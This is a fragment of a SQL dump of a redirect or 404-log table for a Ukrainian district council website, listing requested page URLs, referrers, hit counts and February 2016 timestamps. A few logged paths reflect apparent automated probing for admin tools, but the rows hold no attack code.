00:00:00',301),(25896,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=788:-lr-2012-2015-&catid=45&Itemid=84&lang=ru','','','',3,0,'2016-02-14 15:50:15','0000-00-00 00:00:00',301),(25897,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=791:2012-10-17-06-06-34&catid=45&Itemid=84&lang=en','','','',3,0,'2016-02-14 15:50:18','0000-00-00 00:00:00',301),(25898,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=791:2012-10-17-06-06-34&catid=45&Itemid=84&lang=ru','','','',3,0,'2016-02-14 15:50:20','0000-00-00 00:00:00',301),(25899,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=796:2012-10-18-07-54-09&catid=45&Itemid=84&lang=en','','','',3,0,'2016-02-14 15:50:22','0000-00-00 00:00:00',301),(25900,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=796:2012-10-18-07-54-09&catid=45&Itemid=84&lang=ru','','','',3,0,'2016-02-14 15:50:24','0000-00-00 00:00:00',301),(25901,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=799:2012-10-18-13-37-03&catid=45&Itemid=84&lang=en','','','',3,0,'2016-02-14 15:50:26','0000-00-00 00:00:00',301),(25902,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=799:2012-10-18-13-37-03&catid=45:--14112012-&Itemid=84&lang=en','','','',3,0,'2016-02-14 15:50:28','0000-00-00 00:00:00',301),(25903,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=799:2012-10-18-13-37-03&catid=45:--14112012-&Itemid=84&lang=uk','','','',3,0,'2016-02-14 15:50:30','0000-00-00 00:00:00',301),(25904,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=825:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2016-02-14 15:50:38','0000-00-00 00:00:00',301),(25905,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2016-02-14 15:50:57','0000-00-00 00:00:00',301),(25906,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2016-02-14 15:51:00','0000-00-00 00:00:00',301),(25908,'http://www.malyn-rayrada.org.ua/index.php/941-upravlinnya-pratsi-informue','','','',13,0,'2016-02-14 16:37:51','0000-00-00 00:00:00',301),(25909,'http://www.malyn-rayrada.org.ua/index.php/413-ukaz-prezidenta-ukraini-673-2012','','','',30,0,'2016-02-14 16:39:29','0000-00-00 00:00:00',301),(25910,'http://www.malyn-rayrada.org.ua/index.php/462-za-materialami-zvernen-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-14 16:39:30','0000-00-00 00:00:00',301),(25911,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=845:-------2012----------2013---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2016-02-14 19:00:08','0000-00-00 00:00:00',301),(25912,'http://www.malyn-rayrada.org.ua/index.php/1044-shchodo-okremikh-aspektiv-pensijnogo-zabezpechennya','','','',14,0,'2016-02-15 02:08:11','0000-00-00 00:00:00',301),(25913,'http://www.malyn-rayrada.org.ua/index.php/1066-informue-nachalnik-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-malegus-a-s','','','',30,0,'2016-02-15 03:09:34','0000-00-00 00:00:00',301),(25914,'http://www.malyn-rayrada.org.ua/index.php/18-do-vidoma-zhiteliv-malinshhini?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-02-15 03:11:09','0000-00-00 00:00:00',301),(25915,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/grib-137','','','',3,0,'2016-02-15 03:11:29','0000-00-00 00:00:00',301),(25916,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-68','','','',3,0,'2016-02-15 03:11:31','0000-00-00 00:00:00',301),(25917,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-71','','','',3,0,'2016-02-15 03:11:34','0000-00-00 00:00:00',301),(25918,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0908-10-104','','','',3,0,'2016-02-15 03:12:06','0000-00-00 00:00:00',301),(25919,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-1092-21-113','','','',2,0,'2016-02-15 03:12:19','0000-00-00 00:00:00',301),(25920,'http://www.malyn-rayrada.org.ua/index.php/577-informacija-pro-rezultati-vidchuzhennja-majna?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-02-15 03:15:51','0000-00-00 00:00:00',301),(25921,'http://www.malyn-rayrada.org.ua/index.php/782-dani-pro-vikonannja-dohidnoi-chastini-bjudzhetiv','','','',12,0,'2016-02-15 03:16:35','0000-00-00 00:00:00',301),(25922,'http://www.malyn-rayrada.org.ua/index.php/790-do-vidoma-deputativ-rajonnoi-radi_4?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-15 03:16:42','0000-00-00 00:00:00',301),(25923,'http://www.malyn-rayrada.org.ua/index.php/813-videozvit-iz-svjatkuvannja-dnja-ostannogo-dzvonika','','','',10,0,'2016-02-15 03:17:18','0000-00-00 00:00:00',301),(25924,'http://www.malyn-rayrada.org.ua/index.php/814-pidtrimaemo-ukrainsku-armiju','','','',13,0,'2016-02-15 03:17:23','0000-00-00 00:00:00',301),(25925,'http://www.malyn-rayrada.org.ua/index.php/839-do-vidoma-zhiteliv-malinshhini-3?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-15 03:17:37','0000-00-00 00:00:00',301),(25926,'http://www.malyn-rayrada.org.ua/index.php/886-pro-den-zakhisnika-ukrajini','','','',12,0,'2016-02-15 03:17:58','0000-00-00 00:00:00',301),(25927,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=841:2012-12-10-13-54-17&catid=46&Itemid=85&lang=en','','','',1,0,'2016-02-15 03:25:02','0000-00-00 00:00:00',301),(25928,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=841:2012-12-10-13-54-17&catid=46&Itemid=85&lang=ru','','','',1,0,'2016-02-15 03:25:04','0000-00-00 00:00:00',301),(25929,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=841:2012-12-10-13-54-17&catid=46&Itemid=85&lang=uk','','','',3,0,'2016-02-15 03:25:08','0000-00-00 00:00:00',301),(25930,'http://www.malyn-rayrada.org.ua/index.php/1002-pro-sklikannya-37-sesiji-rajonnoji-radi-6-sklikannya','','','',12,0,'2016-02-15 04:00:54','0000-00-00 00:00:00',301),(25931,'http://www.malyn-rayrada.org.ua/index.php/1059-zarplata-v-konverti-zlidni-na-starist','','','',17,0,'2016-02-15 04:01:27','0000-00-00 00:00:00',301),(25932,'http://www.malyn-rayrada.org.ua/index.php/1251-pro-sklikannya-3-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-15 04:02:08','0000-00-00 00:00:00',301),(25933,'http://www.malyn-rayrada.org.ua/index.php/18-do-vidoma-zhiteliv-malinshhini','','','',23,0,'2016-02-15 04:02:16','0000-00-00 00:00:00',301),(25934,'http://www.malyn-rayrada.org.ua/index.php/19-pro-nadannja-groshovoi-dopomogi-z-nagodi-69-i?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-15 04:02:24','0000-00-00 00:00:00',301),(25935,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-1127-23-115','','','',9,0,'2016-02-15 04:03:26','0000-00-00 00:00:00',301),(25936,'http://www.malyn-rayrada.org.ua/index.php/305-informacija-pro-robotu-komisii-z-pitan-prodazhu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-02-15 04:04:06','0000-00-00 00:00:00',301),(25937,'http://www.malyn-rayrada.org.ua/index.php/404-24-listopada-o-16-00-vidbudetsja-zagalnonacionalna?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-15 04:04:17','0000-00-00 00:00:00',301),(25938,'http://www.malyn-rayrada.org.ua/index.php/657-80-a-richnicja-golodomoru-1932-33-rokiv','','','',23,0,'2016-02-15 04:04:33','0000-00-00 00:00:00',301),(25939,'http://www.malyn-rayrada.org.ua/index.php/687-hristos-rozhdaetsja-slavimo-jogo_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-15 04:04:40','0000-00-00 00:00:00',301),(25940,'http://www.malyn-rayrada.org.ua/index.php/740-do-vidoma-zhiteliv-mista-ta-rajonu_2','','','',11,0,'2016-02-15 04:04:49','0000-00-00 00:00:00',301),(25941,'http://www.malyn-rayrada.org.ua/index.php/788-do-vidoma-pensioneriv_3','','','',22,0,'2016-02-15 04:05:00','0000-00-00 00:00:00',301),(25942,'http://www.malyn-rayrada.org.ua/index.php/790-do-vidoma-deputativ-rajonnoi-radi_4','','','',16,0,'2016-02-15 04:05:03','0000-00-00 00:00:00',301),(25943,'http://www.malyn-rayrada.org.ua/index.php/813-videozvit-iz-svjatkuvannja-dnja-ostannogo-dzvonika?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-15 04:05:13','0000-00-00 00:00:00',301),(25944,'http://www.malyn-rayrada.org.ua/index.php/825-do-vidoma-deputativ-rajonnoi-radi_5','','','',11,0,'2016-02-15 04:05:22','0000-00-00 00:00:00',301),(25945,'http://www.malyn-rayrada.org.ua/index.php/826-pro-ogoloshennja-v-ukraini-dnja-zhalobi','','','',16,0,'2016-02-15 04:05:27','0000-00-00 00:00:00',301),(25946,'http://www.malyn-rayrada.org.ua/index.php/841-nachalnik-pensijnogo-fondu-ukraini-v-malinskomu','','','',35,0,'2016-02-15 04:05:32','0000-00-00 00:00:00',301),(25947,'http://www.malyn-rayrada.org.ua/index.php/878-do-vidoma-zhiteliv-malinshchini?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-15 04:05:40','0000-00-00 00:00:00',301),(25948,'http://www.malyn-rayrada.org.ua/index.php/959-ogoloshennya-shchodo-orendi','','http://go.mail.ru/search_images','',19,0,'2016-02-15 09:50:02','0000-00-00 00:00:00',301),(25949,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&id=40:--28032012-&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','http://go.mail.ru/search_images','',1,0,'2016-02-15 13:02:07','0000-00-00 00:00:00',301),(25950,'http://malyn-rayrada.org.ua/index.php/1059-zarplata-v-konverti-zlidni-na-starist?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-02-15 13:23:52','0000-00-00 00:00:00',301),(25951,'http://malyn-rayrada.org.ua/index.php/1066-informue-nachalnik-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-malegus-a-s','','','',5,0,'2016-02-15 13:23:56','0000-00-00 00:00:00',301),(25952,'http://malyn-rayrada.org.ua/index.php/663-shhodo-vidilennja-avtomobiliv-ekstrenoi-medichnoi','','','',2,0,'2016-02-15 13:25:03','0000-00-00 00:00:00',301),(25953,'http://malyn-rayrada.org.ua/index.php/727-do-vidoma-pensioneriv-onovleno?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-15 13:25:05','0000-00-00 00:00:00',301),(25954,'http://malyn-rayrada.org.ua/index.php/740-do-vidoma-zhiteliv-mista-ta-rajonu_2?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-02-15 13:25:06','0000-00-00 00:00:00',301),(25955,'http://malyn-rayrada.org.ua/index.php/893-yatsenyuk-ozvuchiv-grafik-lyustratsiji?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-02-15 13:25:18','0000-00-00 00:00:00',301),(25956,'http://malyn-rayrada.org.ua/index.php/898-povidomlennya-pro-rezultati-pozachergovikh-viboriv-chopovitskogo-selishchnogo-golovi?tmpl=component&print=1&layout=default&page=','','','',10,0,'2016-02-15 13:25:19','0000-00-00 00:00:00',301),(25957,'http://malyn-rayrada.org.ua/index.php/900-pro-timchasove-vikonannya-obov-yazkiv-golovi-malinskoji-rajonnoji-derzhavnoji-administratsiji-zhitomirskoji-oblasti','','','',5,0,'2016-02-15 13:25:23','0000-00-00 00:00:00',301),(25958,'http://malyn-rayrada.org.ua/index.php/921-shanovni-malinchani-potribna-vasha-dopomoga','','','',12,0,'2016-02-15 13:25:24','0000-00-00 00:00:00',301),(25959,'http://malyn-rayrada.org.ua/index.php/990-pro-perenesennya-dati-sklikannya-drugogo-plenarnogo-zasidannya-36-sesiji-rajonnoji-radi-6-sklikannya','','','',5,0,'2016-02-15 13:25:38','0000-00-00 00:00:00',301),(25960,'http://malyn-rayrada.org.ua/index.php/990-pro-perenesennya-dati-sklikannya-drugogo-plenarnogo-zasidannya-36-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-02-15 13:25:39','0000-00-00 00:00:00',301),(25961,'http://malyn-rayrada.org.ua/index.php/991-ogoloshuetsya-konkurs?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-02-15 13:25:42','0000-00-00 00:00:00',301),(25962,'http://www.malyn-rayrada.org.ua/index.php/906-pro-sklikannya-35-sesiji-rajonnoji-radi-6-sklikannya','','','',5,0,'2016-02-15 13:25:54','0000-00-00 00:00:00',301),(25963,'http://www.malyn-rayrada.org.ua/index.php/917-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue','','','',11,0,'2016-02-15 13:25:58','0000-00-00 00:00:00',301),(25964,'http://www.malyn-rayrada.org.ua/index.php/917-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-02-15 13:25:59','0000-00-00 00:00:00',301),(25965,'http://www.malyn-rayrada.org.ua/index.php/919-sotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-veresen-2014-roku','','','',14,0,'2016-02-15 13:26:01','0000-00-00 00:00:00',301),(25966,'http://www.malyn-rayrada.org.ua/index.php/919-sotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-veresen-2014-roku?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-15 13:26:03','0000-00-00 00:00:00',301),(25967,'http://www.malyn-rayrada.org.ua/index.php/920-oberezhno-chuma-svinej-uzhe-v-ivankivskomu-rajoni?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-02-15 13:26:06','0000-00-00 00:00:00',301),(25968,'http://www.malyn-rayrada.org.ua/index.php/921-shanovni-malinchani-potribna-vasha-dopomoga','','','',6,0,'2016-02-15 13:26:08','0000-00-00 00:00:00',301),(25969,'http://www.malyn-rayrada.org.ua/index.php/921-shanovni-malinchani-potribna-vasha-dopomoga?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-02-15 13:26:10','0000-00-00 00:00:00',301),(25970,'http://www.malyn-rayrada.org.ua/index.php/932-ogoloshennya-shchodo-komunalnogo-majna-orenda','','','',13,0,'2016-02-15 13:26:14','0000-00-00 00:00:00',301),(25971,'http://www.malyn-rayrada.org.ua/index.php/939-malinski-podatkivtsi-informuyut','','','',5,0,'2016-02-15 13:26:16','0000-00-00 00:00:00',301),(25972,'http://www.malyn-rayrada.org.ua/index.php/957-malinska-rajonna-blagodijna-organizatsiya-zakhist-ditej-chornobilya-informue?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-15 13:26:21','0000-00-00 00:00:00',301),(25973,'http://www.malyn-rayrada.org.ua/index.php/959-ogoloshennya-shchodo-orendi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-15 13:26:24','0000-00-00 00:00:00',301),(25974,'http://www.malyn-rayrada.org.ua/index.php/990-pro-perenesennya-dati-sklikannya-drugogo-plenarnogo-zasidannya-36-sesiji-rajonnoji-radi-6-sklikannya','','','',23,0,'2016-02-15 13:26:33','0000-00-00 00:00:00',301),(25975,'http://www.malyn-rayrada.org.ua/index.php/991-ogoloshuetsya-konkurs','','','',16,0,'2016-02-15 13:26:35','0000-00-00 00:00:00',301),(25976,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=204:2010-12-15-14-13-07&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',1,0,'2016-02-15 17:38:53','0000-00-00 00:00:00',301),(25977,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=440:2011-10-21-16-24-47&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-15 18:49:44','0000-00-00 00:00:00',301),(25978,'http://www.malyn-rayrada.org.ua/index.php/686-zustrichaemo-novij-2014-rik-rik-sinogo-derev/','','http://go.mail.ru/search_images','',3,0,'2016-02-15 19:21:17','0000-00-00 00:00:00',301),(25979,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1271-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-radi-vitrat-na-jogo-utrimannya','','','',1,0,'2016-02-15 21:30:22','0000-00-00 00:00:00',301),(25980,'http://www.malyn-rayrada.org.ua/phpMoAdmin-MongoDB-Admin-Tool-for-PHP/moadmin.php','','http://www.malyn-rayrada.org.ua/phpMoAdmin-MongoDB-Admin-Tool-for-PHP/moadmin.php','',1,0,'2016-02-15 23:37:29','0000-00-00 00:00:00',301),(25981,'http://www.malyn-rayrada.org.ua/admin/moadmin.php','','http://www.malyn-rayrada.org.ua/admin/moadmin.php','',1,0,'2016-02-15 23:37:30','0000-00-00 00:00:00',301),(25982,'http://www.malyn-rayrada.org.ua/tools/moadmin.php','','http://www.malyn-rayrada.org.ua/tools/moadmin.php','',1,0,'2016-02-15 23:37:32','0000-00-00 00:00:00',301),(25983,'http://www.malyn-rayrada.org.ua/scripts/moadmin.php','','http://www.malyn-rayrada.org.ua/scripts/moadmin.php','',1,0,'2016-02-15 23:37:34','0000-00-00 00:00:00',301),(25984,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=730:2012-07-02-05-04-18&catid=11&lang=uk','','','',2,0,'2016-02-16 00:01:21','0000-00-00 00:00:00',301),(25985,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1287-pro-vstanovlennya-rozmiru-vartosti-kharchuvannya-ta-batkivskoji-plati-u-doshkilnikh-navchalnikh-zakladakh-na-2016-rik','','','',1,0,'2016-02-16 01:11:39','0000-00-00 00:00:00',301),(25986,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/687-2012-05-24-11-21-04','','','',1,0,'2016-02-16 01:42:41','0000-00-00 00:00:00',301),(25987,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/729--l20-r','','','',1,0,'2016-02-16 01:42:44','0000-00-00 00:00:00',301),(25988,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/730-2012-07-02-05-04-18','','','',1,0,'2016-02-16 01:42:45','0000-00-00 00:00:00',301),(25989,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/731-2012-07-02-08-51-09','','','',1,0,'2016-02-16 01:42:47','0000-00-00 00:00:00',301),(25990,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/743-2012-07-26-08-11-32','','','',1,0,'2016-02-16 01:42:49','0000-00-00 00:00:00',301),(25991,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=911:2013-01-22-13-27-41&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-16 03:09:54','0000-00-00 00:00:00',301),(25992,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=921:-18-6-20-2013-&catid=11&lang=ru&Itemid=','','','',5,0,'2016-02-16 04:07:37','0000-00-00 00:00:00',301),(25993,'http://www.malyn-rayrada.org.ua/index.php/839-do-vidoma-zhiteliv-malinshhini_3','','','',2,0,'2016-02-16 05:35:54','0000-00-00 00:00:00',301),(25994,'http://malyn-rayrada.org.ua/index.php/kontakt','','','',2,0,'2016-02-16 06:59:52','0000-00-00 00:00:00',301),(25995,'http://malyn-rayrada.org.ua/nau:/ukr/1697-18/','','','',2,0,'2016-02-16 07:00:27','0000-00-00 00:00:00',301),(25996,'http://malyn-rayrada.org.ua/nau:/ukr/2453-17/','','','',2,0,'2016-02-16 07:00:29','0000-00-00 00:00:00',301),(25997,'http://malyn-rayrada.org.ua/nau:/ukr/3551-12|st10/','','','',2,0,'2016-02-16 07:00:31','0000-00-00 00:00:00',301),(25998,'http://malyn-rayrada.org.ua/nau:/ukr/4050-17/','','','',2,0,'2016-02-16 07:01:07','0000-00-00 00:00:00',301),(25999,'http://malyn-rayrada.org.ua/wp-content/uploads/wpfoot.php','','http://www.googlebot.com/bot.html','',1,0,'2016-02-16 09:34:45','0000-00-00 00:00:00',301),(26000,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=466:-l-r-2011-&catid=38&Itemid=73&lang=ru','','','',3,0,'2016-02-16 09:45:32','0000-00-00 00:00:00',301),(26001,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1130:2013-11-07-14-04-12&Itemid=14&lang=ru&option=com_content&view=article','','','',116,0,'2016-02-16 10:55:10','0000-00-00 00:00:00',301),(26002,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=905:-2012-2015-&Itemid=86&lang=ru&option=com_content&view=article','','','',4,0,'2016-02-16 11:06:25','0000-00-00 00:00:00',301),(26003,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1106:-qq&Itemid=&lang=ru&option=com_content&view=article','','','',5,0,'2016-02-16 11:08:03','0000-00-00 00:00:00',301),(26004,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/130713-3-127','','','',2,0,'2016-02-16 11:14:04','0000-00-00 00:00:00',301),(26005,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-1092-21-113','','','',2,0,'2016-02-16 11:14:05','0000-00-00 00:00:00',301),(26006,'http://malyn-rayrada.org.ua/index.php/799-pro-sklikannja-31-sesii-rajonnoi-radi-6-sklikannja','','','',3,0,'2016-02-16 11:14:07','0000-00-00 00:00:00',301),(26007,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-72','','','',7,0,'2016-02-16 13:31:45','0000-00-00 00:00:00',301),(26008,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0859-7-101','','','',7,0,'2016-02-16 13:32:05','0000-00-00 00:00:00',301),(26009,'http://malyn-rayrada.org.ua/index.php?catid=11&id=693:2012-06-06-14-15-01&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-16 18:33:16','0000-00-00 00:00:00',301),(26010,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=740:-lr-&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-16 19:52:37','0000-00-00 00:00:00',301),(26011,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1213:2014-02-14-13-53-12&Itemid=0&lang=ru&option=com_content&view=article','','','',29,0,'2016-02-16 19:53:13','0000-00-00 00:00:00',301),(26012,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1075-2013-09-06-09-25-33?lang=ru&Itemid=0','','','',1,0,'2016-02-16 20:37:09','0000-00-00 00:00:00',301),(26013,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=745:2012-07-30-09-12-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2016-02-16 22:24:05','0000-00-00 00:00:00',301),(26014,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=740:-lr-&catid=43:--25072012-&Itemid=82&lang=ru','','','',4,0,'2016-02-16 22:24:06','0000-00-00 00:00:00',301),(26015,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=563:-30012012185-12&catid=39:-22022012-&Itemid=76&lang=ru','','','',2,0,'2016-02-16 22:24:42','0000-00-00 00:00:00',301),(26016,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=272:-2010-&catid=31&Itemid=62&lang=uk','','','',2,0,'2016-02-16 22:24:42','0000-00-00 00:00:00',301),(26017,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/ds3-134','','','',6,0,'2016-02-16 22:24:54','0000-00-00 00:00:00',301),(26018,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=577:--------2011--&catid=39:-22022012-&Itemid=76&lang=uk','','','',8,0,'2016-02-16 22:25:06','0000-00-00 00:00:00',301),(26019,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=513:-lr-2012-2015-&catid=38&Itemid=73&lang=uk','','','',4,0,'2016-02-16 22:25:08','0000-00-00 00:00:00',301),(26020,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=455:2011-11-10-13-39-05&catid=38&Itemid=73&lang=uk','','','',2,0,'2016-02-16 22:25:08','0000-00-00 00:00:00',301),(26021,'http://www.malyn-rayrada.org.ua/index.php/1102-vitaemo-iz-svyatom-ostannogo-dzvonika?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-16 22:25:14','0000-00-00 00:00:00',301),(26022,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0859-7-101','','','',6,0,'2016-02-16 22:25:16','0000-00-00 00:00:00',301),(26023,'http://www.malyn-rayrada.org.ua/index.php/1075-shanovni-malinchani-ta-gosti-malinshchini?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-16 22:25:32','0000-00-00 00:00:00',301),(26024,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/agro2009-120','','','',3,0,'2016-02-16 22:25:37','0000-00-00 00:00:00',301),(26025,'http://www.malyn-rayrada.org.ua/index.php/830-ogoloshennja-kubok-pirizhok','','','',12,0,'2016-02-16 22:25:49','0000-00-00 00:00:00',301),(26026,'http://www.malyn-rayrada.org.ua/index.php/878-do-vidoma-zhiteliv-malinshchini','','','',20,0,'2016-02-16 22:25:50','0000-00-00 00:00:00',301),(26027,'http://www.malyn-rayrada.org.ua/index.php/886-pro-den-zakhisnika-ukrajini?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-16 22:26:00','0000-00-00 00:00:00',301),(26028,'http://www.malyn-rayrada.org.ua/index.php/663-shhodo-vidilennja-avtomobiliv-ekstrenoi-medichnoi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-16 22:26:01','0000-00-00 00:00:00',301),(26029,'http://malyn-rayrada.org.ua/index.php/896-povidomlennya-pro-rezultati-pozachergovikh-viboriv-barvinkivskogo-silskogo-golovi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-16 22:26:29','0000-00-00 00:00:00',301),(26030,'http://malyn-rayrada.org.ua/index.php/898-povidomlennya-pro-rezultati-pozachergovikh-viboriv-chopovitskogo-selishchnogo-golovi','','','',5,0,'2016-02-16 22:26:31','0000-00-00 00:00:00',301),(26031,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=878:2012-12-21-16-59-28&catid=46:--21122012&Itemid=85&lang=ru','','','',2,0,'2016-02-16 22:30:12','0000-00-00 00:00:00',301),(26032,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=462:-2012-&catid=38&Itemid=73&lang=uk','','','',2,0,'2016-02-16 22:30:14','0000-00-00 00:00:00',301),(26033,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=18:2010-06-06-10-06-41&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',8,0,'2016-02-16 22:30:17','0000-00-00 00:00:00',301),(26034,'http://www.malyn-rayrada.org.ua/index.php/1262-viddil-statistiki-informue?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-02-16 22:30:17','0000-00-00 00:00:00',301),(26035,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&lang=en','','','',1,0,'2016-02-16 22:30:19','0000-00-00 00:00:00',301),(26036,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=321:------------l---------r--2011-2016-&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-17 05:22:16','0000-00-00 